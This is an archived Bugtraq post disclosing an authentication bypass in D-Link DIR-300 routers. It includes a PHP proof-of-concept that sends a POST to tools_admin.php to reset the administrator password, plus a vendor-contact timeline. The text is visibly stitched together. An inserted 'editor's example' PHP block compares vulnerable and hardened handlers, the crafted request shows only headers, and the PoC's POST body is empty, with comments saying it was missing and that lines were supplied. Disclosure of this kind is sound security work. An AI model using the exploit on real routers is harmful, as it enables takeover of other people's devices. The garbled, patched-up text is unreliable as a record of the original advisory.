Bugtraq mailing list archives

D-Link DIR-300 authentication bypass
From: Karol Celiński <karol () celin pl>
Date: Tue, 9 Nov 2010 10:05:12 +0100

Hello, I found a security bug in the D-Link DIR-300 wireless router. It can
be used to bypass the authentication mechanism by an attacker with access to
the web interface. I reported it to D-Link but they are not replying to
my emails. Judging by other D-Link security holes and their status, I
think they won't reply, so I decided to write about it here.

[Technical details]

The control panel script tools_admin.php allows an attacker to change the
administrator name, password and other variables without any
authorization, by sending a specially crafted HTTP POST request such as:

---cut here---
Keep-Alive: 115
Content-Type: application/x-www-form-urlencoded
Content-length: 0

---cut here---

If an attacker sends this request to the control panel, the
administrator username is set to admin with the password "uhOHahEh".
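To make the bug class concrete, here is an added illustration (editor's example, not D-Link firmware code and not the author's PoC) of the shape tools_admin.php has according to the description above: a handler that writes POSTed admin credentials without any session check, next to a hardened version of the same handler. The field names admin_name, admin_password, old_password and csrf_token, the success string and the in-memory config array are assumptions; the real script's parameters are not shown in this post.

```php
<?php
// Added example, not D-Link firmware and not the advisory's PoC: a minimal
// reconstruction of the bug class in tools_admin.php (settings applied from
// a POST with no authorization), beside a hardened handler.
// Field names and the config layout are assumptions made for this example.

// Simulated device configuration (an in-memory array instead of NVRAM).
$config = [
    'admin_name'          => 'admin',
    'admin_password_hash' => password_hash('initial-secret', PASSWORD_DEFAULT),
];

// Vulnerable shape: trusts any POST. No session check, no re-authentication,
// so an unauthenticated client on the LAN can overwrite the admin account.
function tools_admin_vulnerable(array $post, array $session, array &$config): string
{
    if (isset($post['admin_name'], $post['admin_password'])) {
        $config['admin_name']          = $post['admin_name'];
        $config['admin_password_hash'] = password_hash($post['admin_password'], PASSWORD_DEFAULT);
        return 'Successfully saved settings';   // contains the word the advisory's PoC greps for
    }
    return 'No changes';
}

// Hardened shape: authenticate the session, bind the form to that session,
// re-prove the current password, validate, and only then write.
function tools_admin_hardened(array $post, array $session, array &$config): string
{
    // 1. Only an authenticated admin session may reach this handler at all.
    if (empty($session['authenticated']) || ($session['user'] ?? null) !== $config['admin_name']) {
        return '401 Unauthorized';
    }
    // 2. CSRF: the token in the form must match the one issued to this session.
    if (!isset($post['csrf_token'], $session['csrf_token'])
        || !hash_equals($session['csrf_token'], $post['csrf_token'])) {
        return '403 Forbidden';
    }
    if (!isset($post['admin_name'], $post['admin_password'], $post['old_password'])) {
        return 'No changes';
    }
    // 3. A credential change re-requires the current password, so a hijacked
    //    session cookie alone is not enough to lock the owner out.
    if (!password_verify($post['old_password'], $config['admin_password_hash'])) {
        return '403 Forbidden';
    }
    // 4. Basic input policy before anything is persisted.
    if (!preg_match('/^[A-Za-z0-9_-]{1,32}$/', $post['admin_name']) || strlen($post['admin_password']) < 8) {
        return '400 Bad Request';
    }
    $config['admin_name']          = $post['admin_name'];
    $config['admin_password_hash'] = password_hash($post['admin_password'], PASSWORD_DEFAULT);
    return 'Successfully saved settings';
}

// Constructed attacker request: no session cookie at all, so an empty session.
$attackerPost = ['admin_name' => 'admin', 'admin_password' => 'uhOHahEh'];
$noSession    = [];

$c1 = $config;
echo "vulnerable: " . tools_admin_vulnerable($attackerPost, $noSession, $c1) . "\n";
echo "  attacker password now valid: "
   . (password_verify('uhOHahEh', $c1['admin_password_hash']) ? 'yes' : 'no') . "\n";

$c2 = $config;
echo "hardened:   " . tools_admin_hardened($attackerPost, $noSession, $c2) . "\n";
echo "  attacker password now valid: "
   . (password_verify('uhOHahEh', $c2['admin_password_hash']) ? 'yes' : 'no') . "\n";

// A legitimate change through the hardened handler: real session, matching
// CSRF token, and the current password supplied.
$token     = bin2hex(random_bytes(16));
$session   = ['authenticated' => true, 'user' => 'admin', 'csrf_token' => $token];
$adminPost = $attackerPost + ['old_password' => 'initial-secret', 'csrf_token' => $token];
echo "hardened (authenticated): " . tools_admin_hardened($adminPost, $session, $c2) . "\n";
```

Run it with `php example.php`. The first handler accepts the sessionless request and the attacker's password becomes valid, which is the behaviour the advisory reports; the second rejects it at the session check and only accepts the change when the session, token and current password all line up. On a real device the 401 would be a redirect to the login page, but the ordering is the point: authorization before any write.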

[Affected devices]

- All known D-Link DIR-300 firmware (i.e. 2.01B1, 1.04, 1.05).
- There is a possibility that other D-Link devices which use the same PHP
scripts in the control panel are affected. I'm not able to check it
because I don't have the devices to test. I'm counting on you ;->


[Proof of concept]

---cut here---
<?php
        // D-Link DIR-300 tools_admin.php authentication bypass PoC
        // Usage: php5 <script> <router ip address> <port> <new admin password>
        if(sizeof($argv)!=4) {
                echo "Usage: php5 $argv[0] <router ip address> <port> <admin password>\n";
                exit(1);
        }
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "http://".$argv[1]."/tools_admin.php");
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_PORT, $argv[2]);
        curl_setopt($ch, CURLOPT_POST, 1);
        // The crafted POST body (the tools_admin.php form fields that set the
        // admin name to "admin" and the password to $argv[3]) is missing from
        // the archived copy of this post and has to be filled in here.
        $postfields = "";
        curl_setopt($ch, CURLOPT_POSTFIELDS, $postfields);
        echo "+ starting request\n";
        $out = curl_exec($ch);
        if($out===false) {
                // curl_error() supplied to complete the truncated line
                echo "- Error: could not connect (".curl_error($ch).")\n";
                exit(1);
        } else
                echo "+ request sent\n";
        if(stripos($out,"Successfully")===false) {
                echo "- something went wrong (check the answer - answer.html) !\n";
                $f=fopen("answer.html","w"); fwrite($f,$out); fclose($f);
        } else
                echo "+ ok, now you can login using l: admin p:$argv[3]\n";
        curl_close($ch);
?>
---cut here---


[Timeline]

 - Information sent to vendor 07.08.2010
 - No response
 - Information resent to vendor 07.31.2010
 - No response from vendor

Karol Celiński ( Celin )
Pentester/Researcher @ Safe Computing


karol at celin dot pl

Tomasz Sawiak, Jacek Kowalski, Marcin Kozlowski, Robert Tomczykowski,
Wojtek Machaj, Marek Zmyslowski, Szymon Sobczyk and all Safe Computing
